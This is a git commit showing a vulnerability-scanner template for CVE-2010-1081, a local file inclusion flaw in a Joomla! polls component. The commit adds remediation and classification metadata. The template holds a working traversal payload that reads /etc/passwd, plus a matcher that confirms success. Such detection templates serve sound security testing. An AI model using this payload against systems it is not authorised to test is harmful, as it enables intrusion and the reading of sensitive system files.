Enhancement: cves/2010/CVE-2010-1081.yaml by mp

patch-1
MostInterestingBotInTheWorld 2022-02-13 13:44:39 -05:00
parent 0e270b6056
commit 5f7bddc723
1 changed files with 7 additions and 8 deletions

View File

@ -1,27 +1,26 @@
id: CVE-2010-1081
id: CVE-2010-1081
info:
name: Joomla! Component com_communitypolls 1.5.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
description: A directory traversal vulnerability in the Community Polls (com_communitypolls) component 1.5.2, and possibly earlier, for Core Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
remediation: Apply all relevant security patches and product upgrades.
reference:
- https://www.exploit-db.com/exploits/11511
- https://www.cvedetails.com/cve/CVE-2010-1081
tags: cve,cve2010,joomla,lfi
classification:
cve-id: CVE-2010-1081
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200
- 200
# Enhanced by mp on 2022/02/13